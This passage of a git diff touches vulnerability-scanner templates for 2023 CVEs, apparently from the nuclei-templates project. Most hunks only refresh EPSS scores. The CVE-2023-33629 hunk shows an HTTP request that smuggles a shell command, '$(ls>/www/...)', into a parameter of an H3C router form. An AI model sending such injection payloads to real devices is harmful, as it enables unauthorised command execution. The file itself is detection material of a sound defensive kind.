b/http/cves/2023/CVE-2023-30625.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-30625 cwe-id: CWE-89 epss-score: 0.93337 - epss-percentile: 0.98803 + epss-percentile: 0.98804 cpe: cpe:2.3:a:rudderstack:rudder-server:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-30777.yaml b/http/cves/2023/CVE-2023-30777.yaml index a0884c2455..04a2115930 100644 --- a/http/cves/2023/CVE-2023-30777.yaml +++ b/http/cves/2023/CVE-2023-30777.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-30777 cwe-id: CWE-79 epss-score: 0.00273 - epss-percentile: 0.6443 + epss-percentile: 0.64464 cpe: cpe:2.3:a:advancedcustomfields:advanced_custom_fields:*:*:*:*:-:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30868.yaml b/http/cves/2023/CVE-2023-30868.yaml index e1e71003cb..614978a2bc 100644 --- a/http/cves/2023/CVE-2023-30868.yaml +++ b/http/cves/2023/CVE-2023-30868.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-30868 cwe-id: CWE-79 epss-score: 0.00069 - epss-percentile: 0.28856 + epss-percentile: 0.28862 cpe: cpe:2.3:a:cms_tree_page_view_project:cms_tree_page_view:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-30943.yaml b/http/cves/2023/CVE-2023-30943.yaml index 023b0ea369..e5e2162cad 100644 --- a/http/cves/2023/CVE-2023-30943.yaml +++ b/http/cves/2023/CVE-2023-30943.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-30943 cwe-id: CWE-610,CWE-73 epss-score: 0.01461 - epss-percentile: 0.85272 + epss-percentile: 0.85281 cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2023/CVE-2023-31059.yaml b/http/cves/2023/CVE-2023-31059.yaml index 1b947f0e9a..3c4c46998b 100644 --- a/http/cves/2023/CVE-2023-31059.yaml +++ b/http/cves/2023/CVE-2023-31059.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-31059 cwe-id: CWE-22 epss-score: 0.00393 - epss-percentile: 0.70484 + epss-percentile: 0.70507 cpe: cpe:2.3:a:repetier-server:repetier-server:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-31465.yaml b/http/cves/2023/CVE-2023-31465.yaml index cfe57ebeca..b5c74bc107 100644 --- a/http/cves/2023/CVE-2023-31465.yaml +++ b/http/cves/2023/CVE-2023-31465.yaml @@ -15,7 +15,7 @@ info: cvss-score: 9.8 cve-id: CVE-2023-31465 epss-score: 0.00698 - epss-percentile: 0.78069 + epss-percentile: 0.78083 cpe: cpe:2.3:a:fsmlabs:timekeeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-31548.yaml b/http/cves/2023/CVE-2023-31548.yaml index 0598a05de3..56e74fe437 100644 --- a/http/cves/2023/CVE-2023-31548.yaml +++ b/http/cves/2023/CVE-2023-31548.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-31548 cwe-id: CWE-79 epss-score: 0.00078 - epss-percentile: 0.32378 + epss-percentile: 0.32386 cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3219.yaml b/http/cves/2023/CVE-2023-3219.yaml index 405231b1b0..980996c8bc 100644 --- a/http/cves/2023/CVE-2023-3219.yaml +++ b/http/cves/2023/CVE-2023-3219.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-3219 cwe-id: CWE-639 epss-score: 0.45245 - epss-percentile: 0.97002 + epss-percentile: 0.97005 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-32235.yaml b/http/cves/2023/CVE-2023-32235.yaml index 32a1d2bed0..2360c29415 100644 --- a/http/cves/2023/CVE-2023-32235.yaml +++ b/http/cves/2023/CVE-2023-32235.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-32235 cwe-id: CWE-22 epss-score: 0.00998 - epss-percentile: 0.81941 + epss-percentile: 0.81952 cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-32243.yaml b/http/cves/2023/CVE-2023-32243.yaml index 8ae3de4ecf..53703e7a64 100644 --- a/http/cves/2023/CVE-2023-32243.yaml +++ b/http/cves/2023/CVE-2023-32243.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-32243 cwe-id: CWE-287 epss-score: 0.02548 - epss-percentile: 0.89028 + epss-percentile: 0.89035 cpe: cpe:2.3:a:wpdeveloper:essential_addons_for_elementor:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-32563.yaml b/http/cves/2023/CVE-2023-32563.yaml index 157d742f91..50303ac009 100644 --- a/http/cves/2023/CVE-2023-32563.yaml +++ b/http/cves/2023/CVE-2023-32563.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-32563 cwe-id: CWE-22 epss-score: 0.27941 - epss-percentile: 0.96291 + epss-percentile: 0.96295 cpe: cpe:2.3:a:ivanti:avalanche:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-33338.yaml b/http/cves/2023/CVE-2023-33338.yaml index 61aacd15b3..265c2d2b57 100644 --- a/http/cves/2023/CVE-2023-33338.yaml +++ b/http/cves/2023/CVE-2023-33338.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-33338 cwe-id: CWE-89 epss-score: 0.00761 - epss-percentile: 0.79106 + epss-percentile: 0.79115 cpe: cpe:2.3:a:old_age_home_management_system_project:old_age_home_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-33405.yaml b/http/cves/2023/CVE-2023-33405.yaml index 582dcac327..44d2aa2b52 100644 --- a/http/cves/2023/CVE-2023-33405.yaml +++ b/http/cves/2023/CVE-2023-33405.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-33405 cwe-id: CWE-601 epss-score: 0.00071 - epss-percentile: 0.2954 + epss-percentile: 0.29545 cpe: cpe:2.3:a:blogengine:blogengine.net:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-33439.yaml b/http/cves/2023/CVE-2023-33439.yaml index bcac032d9b..99601cb895 100644 --- a/http/cves/2023/CVE-2023-33439.yaml +++ b/http/cves/2023/CVE-2023-33439.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-33439 cwe-id: CWE-89 epss-score: 0.00475 - epss-percentile: 0.73038 + epss-percentile: 0.73067 cpe: cpe:2.3:a:faculty_evaluation_system_project:faculty_evaluation_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-33440.yaml b/http/cves/2023/CVE-2023-33440.yaml index 8cc0804d8b..dcba23d3cf 100644 --- a/http/cves/2023/CVE-2023-33440.yaml +++ b/http/cves/2023/CVE-2023-33440.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-33440 cwe-id: CWE-434 epss-score: 0.04526 - epss-percentile: 0.91546 + epss-percentile: 0.91557 cpe: cpe:2.3:a:faculty_evaluation_system_project:faculty_evaluation_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3345.yaml b/http/cves/2023/CVE-2023-3345.yaml index e941d8d427..1a82223a6c 100644 --- a/http/cves/2023/CVE-2023-3345.yaml +++ b/http/cves/2023/CVE-2023-3345.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-3345 cwe-id: CWE-200 epss-score: 0.00441 - epss-percentile: 0.72027 + epss-percentile: 0.72052 cpe: cpe:2.3:a:masteriyo:masteriyo:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-33510.yaml b/http/cves/2023/CVE-2023-33510.yaml index e2a341db54..a11961d143 100644 --- a/http/cves/2023/CVE-2023-33510.yaml +++ b/http/cves/2023/CVE-2023-33510.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-33510 cwe-id: CWE-668 epss-score: 0.00347 - epss-percentile: 0.68579 + epss-percentile: 0.68606 cpe: cpe:2.3:a:jeecg_p3_biz_chat_project:jeecg_p3_biz_chat:1.0.5:*:*:*:*:wordpress:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-33568.yaml b/http/cves/2023/CVE-2023-33568.yaml index 6e6bb19831..f2b8b52e6b 100644 --- a/http/cves/2023/CVE-2023-33568.yaml +++ b/http/cves/2023/CVE-2023-33568.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-33568 cwe-id: CWE-552 epss-score: 0.39144 - epss-percentile: 0.96832 + epss-percentile: 0.96834 cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-33584.yaml b/http/cves/2023/CVE-2023-33584.yaml index 2817a569af..903ca024be 100644 --- a/http/cves/2023/CVE-2023-33584.yaml +++ b/http/cves/2023/CVE-2023-33584.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-33584 cwe-id: CWE-89 epss-score: 0.05622 - epss-percentile: 0.92441 + epss-percentile: 0.92447 cpe: cpe:2.3:a:enrollment_system_project:enrollment_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-33629.yaml b/http/cves/2023/CVE-2023-33629.yaml index f43c1a6f3a..39655303df 100644 --- a/http/cves/2023/CVE-2023-33629.yaml +++ b/http/cves/2023/CVE-2023-33629.yaml @@ -3,18 +3,27 @@ id: CVE-2023-33629 info: name: H3C Magic R300-2100M - Remote Code Execution author: DhiyaneshDK - severity: critical + severity: high description: | H3C Magic R300 version R300-2100MV100R004 was discovered to contain a stack overflow via the DeltriggerList interface at /goform/aspForm. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-33629 - https://hackmd.io/@0dayResearch/r1UjggZfh + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2023-33629 + cwe-id: CWE-787 + epss-score: 0.0005 + epss-percentile: 0.16955 + cpe: cpe:2.3:o:h3c:magic_r300-2100m_firmware:r300-2100mv100r004:*:*:*:*:*:*:* metadata: - max-request: 1 verified: true + max-request: 2 + vendor: h3c + product: magic_r300-2100m_firmware fofa-query: app="H3C-Ent-Router" tags: cve,cve2023,router,rce,h3c - variables: filename: "{{to_lower(rand_text_alpha(7))}}" @@ -25,7 +34,6 @@ http: Host: {{Hostname}} CMD=DelL2tpLNSList&GO=vpn_l2tp_session.asp¶m=1; $(ls>/www/{{filename}}); - - | GET /{{filename}} HTTP/1.1 Host: {{Hostname}} diff --git a/http/cves/2023/CVE-2023-33831.yaml b/http/cves/2023/CVE-2023-33831.yaml index c22367d698..a808286946 100644 --- a/http/cves/2023/CVE-2023-33831.yaml +++ b/http/cves/2023/CVE-2023-33831.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-33831 cwe-id: CWE-77 epss-score: 0.03756 - epss-percentile: 0.90784 + epss-percentile: 0.9079 cpe: cpe:2.3:a:frangoteam:fuxa:1.1.13:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-34124.yaml b/http/cves/2023/CVE-2023-34124.yaml index 3d9d0ad147..f6b7826621 100644 --- a/http/cves/2023/CVE-2023-34124.yaml +++ b/http/cves/2023/CVE-2023-34124.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-34124 cwe-id: CWE-287,CWE-305 epss-score: 0.01627 - epss-percentile: 0.86109 + epss-percentile: 0.86113 cpe: cpe:2.3:a:sonicwall:analytics:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34192.yaml b/http/cves/2023/CVE-2023-34192.yaml index 43bcebdc9a..0645e2346e 100644 --- a/http/cves/2023/CVE-2023-34192.yaml +++ b/http/cves/2023/CVE-2023-34192.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-34192 cwe-id: CWE-79 epss-score: 0.28331 - epss-percentile: 0.96314 + epss-percentile: 0.96317 cpe: cpe:2.3:a:zimbra:collaboration:8.8.15:-:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-34259.yaml b/http/cves/2023/CVE-2023-34259.yaml index 10cd150122..3209a29591 100644 --- a/http/cves/2023/CVE-2023-34259.yaml +++ b/http/cves/2023/CVE-2023-34259.yaml @@ -12,6 +12,8 @@ info: - https://sec-consult.com/vulnerability-lab/advisory/path-traversal-bypass-denial-of-service-in-kyocera-printer/ - https://www.kyoceradocumentsolutions.com/en/our-business/security/information/2023-07-14.html - https://packetstormsecurity.com/files/173397/Kyocera-TASKalfa-4053ci-2VG_S000.002.561-Path-Traversal-Denial-Of-Service.html + - https://sec-consult.com/vulnerability-lab/ + - https://seclists.org/fulldisclosure/2023/Jul/15 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 diff --git a/http/cves/2023/CVE-2023-34362.yaml b/http/cves/2023/CVE-2023-34362.yaml index 807ff3ab96..94321e0e61 100644 --- a/http/cves/2023/CVE-2023-34362.yaml +++ b/http/cves/2023/CVE-2023-34362.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-34362 cwe-id: CWE-89 epss-score: 0.92179 - epss-percentile: 0.98652 + epss-percentile: 0.98653 cpe: cpe:2.3:a:progress:moveit_cloud:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml index ebb3fe5d05..c3904d90d2 100644 --- a/http/cves/2023/CVE-2023-34537.yaml +++ b/http/cves/2023/CVE-2023-34537.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-34537 cwe-id: CWE-79 epss-score: 0.0007 - epss-percentile: 0.29264 + epss-percentile: 0.29269 cpe: cpe:2.3:a:digitaldruid:hoteldruid:3.0.5:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml index 9a45503fe2..646b1f61ec 100644 --- a/http/cves/2023/CVE-2023-34598.yaml +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-34598 cwe-id: CWE-22 epss-score: 0.03642 - epss-percentile: 0.90641 + epss-percentile: 0.90647 cpe: cpe:2.3:a:gibbonedu:gibbon:25.0.00:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34599.yaml b/http/cves/2023/CVE-2023-34599.yaml index bb771e34e2..33d57def5a 100644 --- a/http/cves/2023/CVE-2023-34599.yaml +++ b/http/cves/2023/CVE-2023-34599.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-34599 cwe-id: CWE-79 epss-score: 0.00071 - epss-percentile: 0.29569 + epss-percentile: 0.29573 cpe: cpe:2.3:a:gibbonedu:gibbon:25.0.00:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2023/CVE-2023-34659.yaml b/http/cves/2023/CVE-2023-34659.yaml index 2beeb2c14d..6d7d2893e2 100644 --- a/http/cves/2023/CVE-2023-34659.yaml +++ b/http/cves/2023/CVE-2023-34659.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-34659 cwe-id: CWE-89 epss-score: 0.05584 - epss-percentile: 0.92417 + epss-percentile: 0.92424 cpe: cpe:2.3:a:jeecg:jeecg_boot:3.5.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-34751.yaml b/http/cves/2023/CVE-2023-34751.yaml index 6d46827a72..02c3426464 100644 --- a/http/cves/2023/CVE-2023-34751.yaml +++ b/http/cves/2023/CVE-2023-34751.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-34751 cwe-id: CWE-89 epss-score: 0.01254 - epss-percentile: 0.8406 + epss-percentile: 0.84068 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-34752.yaml b/http/cves/2023/CVE-2023-34752.yaml index 0fdd474a12..fdf3b68507 100644 --- a/http/cves/2023/CVE-2023-34752.yaml +++ b/http/cves/2023/CVE-2023-34752.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-34752 cwe-id: CWE-89 epss-score: 0.05297 - epss-percentile: 0.92212 + epss-percentile: 0.9222 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-34753.yaml b/http/cves/2023/CVE-2023-34753.yaml index 216c7744a0..46d3717417 100644 --- a/http/cves/2023/CVE-2023-34753.yaml +++ b/http/cves/2023/CVE-2023-34753.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-34753 cwe-id: CWE-89 epss-score: 0.01254 - epss-percentile: 0.8406 + epss-percentile: 0.84068 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-34755.yaml b/http/cves/2023/CVE-2023-34755.yaml index fdc0b9547e..6dc1d54f37 100644 --- a/http/cves/2023/CVE-2023-34755.yaml +++ b/http/cves/2023/CVE-2023-34755.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-34755 cwe-id: CWE-89 epss-score: 0.01254 - epss-percentile: 0.8406 + epss-percentile: 0.84068 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-34756.yaml b/http/cves/2023/CVE-2023-34756.yaml index c3eb643160..380332a649 100644 --- a/http/cves/2023/CVE-2023-34756.yaml +++ b/http/cves/2023/CVE-2023-34756.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-34756 cwe-id: CWE-89 epss-score: 0.01254 - epss-percentile: 0.8406 + epss-percentile: 0.84068 cpe: cpe:2.3:a:bloofox:bloofoxcms:0.5.2.1:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml index 8ed6a342c8..6b0b156151 100644 --- a/http/cves/2023/CVE-2023-3479.yaml +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-3479 cwe-id: CWE-79 epss-score: 0.0007 - epss-percentile: 0.29293 + epss-percentile: 0.29297 cpe: cpe:2.3:a:hestiacp:control_panel:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34843.yaml b/http/cves/2023/CVE-2023-34843.yaml index f251ceb482..3e5cd1e2d7 100644 --- a/http/cves/2023/CVE-2023-34843.yaml +++ b/http/cves/2023/CVE-2023-34843.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-34843 cwe-id: CWE-22 epss-score: 0.00349 - epss-percentile: 0.68722 + epss-percentile: 0.68748 cpe: cpe:2.3:a:traggo:traggo:0.3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-34960.yaml b/http/cves/2023/CVE-2023-34960.yaml index aece24aa51..e2cc884699 100644 --- a/http/cves/2023/CVE-2023-34960.yaml +++ b/http/cves/2023/CVE-2023-34960.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-34960 cwe-id: CWE-77 epss-score: 0.88794 - epss-percentile: 0.98371 + epss-percentile: 0.98372 cpe: cpe:2.3:a:chamilo:chamilo:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-35082.yaml b/http/cves/2023/CVE-2023-35082.yaml index ad4548099a..2f927041c3 100644 --- a/http/cves/2023/CVE-2023-35082.yaml +++ b/http/cves/2023/CVE-2023-35082.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-35082 cwe-id: CWE-287 epss-score: 0.06863 - epss-percentile: 0.93149 + epss-percentile: 0.93153 cpe: cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-35813.yaml b/http/cves/2023/CVE-2023-35813.yaml index 94e472ab97..daac1adf75 100644 --- a/http/cves/2023/CVE-2023-35813.yaml +++ b/http/cves/2023/CVE-2023-35813.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-35813 cwe-id: CWE-22,CWE-23 epss-score: 0.20819 - epss-percentile: 0.95836 + epss-percentile: 0.95838 cpe: cpe:2.3:a:sitecore:experience_commerce:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml index 43f00f802e..99dcb04913 100644 --- a/http/cves/2023/CVE-2023-35843.yaml +++ b/http/cves/2023/CVE-2023-35843.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-35843 cwe-id: CWE-22 epss-score: 0.01891 - epss-percentile: 0.87173 + epss-percentile: 0.87178 cpe: cpe:2.3:a:nocodb:nocodb:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-35844.yaml b/http/cves/2023/CVE-2023-35844.yaml index 0979808fba..97c28a7722 100644 --- a/http/cves/2023/CVE-2023-35844.yaml +++ b/http/cves/2023/CVE-2023-35844.yaml @@ -23,7 +23,7 @@ info: cve-id: CVE-2023-35844 cwe-id: CWE-22 epss-score: 0.00499 - epss-percentile: 0.73653 + epss-percentile: 0.7368 cpe: cpe:2.3:a:lightdash:lightdash:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-35885.yaml b/http/cves/2023/CVE-2023-35885.yaml index b50fe7d251..c92e5673a6 100644 --- a/http/cves/2023/CVE-2023-35885.yaml +++ b/http/cves/2023/CVE-2023-35885.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-35885 cwe-id: CWE-565 epss-score: 0.02149 - epss-percentile: 0.88065 + epss-percentile: 0.8807 cpe: cpe:2.3:a:mgt-commerce:cloudpanel:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-36287.yaml b/http/cves/2023/CVE-2023-36287.yaml index bfae6d8007..2fbb49fa2d 100644 --- a/http/cves/2023/CVE-2023-36287.yaml +++ b/http/cves/2023/CVE-2023-36287.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-36287 cwe-id: CWE-79 epss-score: 0.00077 - epss-percentile: 0.32002 + epss-percentile: 0.32009 cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-36289.yaml b/http/cves/2023/CVE-2023-36289.yaml index a352f4e00b..b7a68dc011 100644 --- a/http/cves/2023/CVE-2023-36289.yaml +++ b/http/cves/2023/CVE-2023-36289.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-36289 cwe-id: CWE-79 epss-score: 0.00077 - epss-percentile: 0.32002 + epss-percentile: 0.32009 cpe: cpe:2.3:a:webkul:qloapps:1.6.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-36306.yaml b/http/cves/2023/CVE-2023-36306.yaml index 34777d49b0..d0d8eb54dc 100644 --- a/http/cves/2023/CVE-2023-36306.yaml +++ b/http/cves/2023/CVE-2023-36306.yaml @@ -15,7 +15,7 @@ info: cve-id: CVE-2023-36306 cwe-id: CWE-79 epss-score: 0.00194 - epss-percentile: 0.57032 + epss-percentile: 0.5706 cpe: cpe:2.3:a:adiscon:loganalyzer:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml index 607d77132b..dda5c5f7d8 100644 --- a/http/cves/2023/CVE-2023-36346.yaml +++ b/http/cves/2023/CVE-2023-36346.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-36346 cwe-id: CWE-79 epss-score: 0.00075 - epss-percentile: 0.31114 + epss-percentile: 0.31119 cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2023/CVE-2023-36844.yaml b/http/cves/2023/CVE-2023-36844.yaml index dd59407697..f72e25291f 100644 --- a/http/cves/2023/CVE-2023-36844.yaml +++ b/http/cves/2023/CVE-2023-36844.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-36844 cwe-id: CWE-473 epss-score: 0.02557 - epss-percentile: 0.89043 + epss-percentile: 0.89049 cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-36845.yaml b/http/cves/2023/CVE-2023-36845.yaml index 012e820c07..fb05171e58 100644 --- a/http/cves/2023/CVE-2023-36845.yaml +++ b/http/cves/2023/CVE-2023-36845.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-36845 cwe-id: CWE-473 epss-score: 0.37937 - epss-percentile: 0.96781 + epss-percentile: 0.96783 cpe: cpe:2.3:o:juniper:junos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-36934.yaml b/http/cves/2023/CVE-2023-36934.yaml index 78ff967dac..616ce40136 100644 --- a/http/cves/2023/CVE-2023-36934.yaml +++ b/http/cves/2023/CVE-2023-36934.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2023-36934 cwe-id: CWE-89 epss-score: 0.0165 - epss-percentile: 0.86187 + epss-percentile: 0.86193 cpe: cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-3710.yaml b/http/cves/2023/CVE-2023-3710.yaml index 55ad26f56b..1dc90e6559 100644 --- a/http/cves/2023/CVE-2023-3710.yaml +++ b/http/cves/2023/CVE-2023-3710.yaml @@ -16,9 +16,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-3710 - cwe-id: CWE-20,CWE-77 + cwe-id: CWE-77,CWE-20 epss-score: 0.70301 - epss-percentile: 0.97663 + epss-percentile: 0.97664 cpe: cpe:2.3:o:honeywell:pm43_firmware:*:*:*:*:*:*:*:* metadata: verified: true @@ -52,4 +52,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cdcbdd907d9c1e87034b23653b3cf17e2df59fb2e980e9871c3302f7f1a46e270220331d5f4cf2cf08508516a6e1a216be4d28de0ae44f865a521b6e45c4c2ec96da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100cdcbdd907d9c1e87034b23653b3cf17e2df59fb2e980e9871c3302f7f1a46e270220331d5f4cf2cf08508516a6e1a216be4d28de0ae44f865a521b6e45c4c2ec96da:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2023/CVE-2023-37265.yaml b/http/cves/2023/CVE-2023-37265.yaml index 517fee4454..36cb290ad3 100644 --- a/http/cves/2023/CVE-2023-37265.yaml +++ b/http/cves/2023/CVE-2023-37265.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-37265 cwe-id: CWE-306 epss-score: 0.10511 - epss-percentile: 0.94386 + epss-percentile: 0.9439 cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37266.yaml b/http/cves/2023/CVE-2023-37266.yaml index 8f91898844..2938605345 100644 --- a/http/cves/2023/CVE-2023-37266.yaml +++ b/http/cves/2023/CVE-2023-37266.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2023-37266 cwe-id: CWE-287 epss-score: 0.06246 - epss-percentile: 0.92803 + epss-percentile: 0.92808 cpe: cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37270.yaml b/http/cves/2023/CVE-2023-37270.yaml index c941505469..13ec75afb6 100644 --- a/http/cves/2023/CVE-2023-37270.yaml +++ b/http/cves/2023/CVE-2023-37270.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2023-37270 cwe-id: CWE-89 epss-score: 0.01401 - epss-percentile: 0.84989 + epss-percentile: 0.84994 cpe: cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37462.yaml b/http/cves/2023/CVE-2023-37462.yaml index 22d247a483..c37170cb69 100644 --- a/http/cves/2023/CVE-2023-37462.yaml +++ b/http/cves/2023/CVE-2023-37462.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2023-37462 cwe-id: CWE-74 epss-score: 0.26117 - epss-percentile: 0.96188 + epss-percentile: 0.96191 cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2023/CVE-2023-37474.yaml b/http/cves/2023/CVE-2023-37474.yaml index 2ce0adddfa..8ecf0f9962 100644 --- a/http/cves/2023/CVE-2023-37474.yaml +++ b/http/cves/2023/CVE-2023-37474.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2023-37474 cwe-id: CWE-22 epss-score: 0.02398 - epss-percentile: 0.88708 + 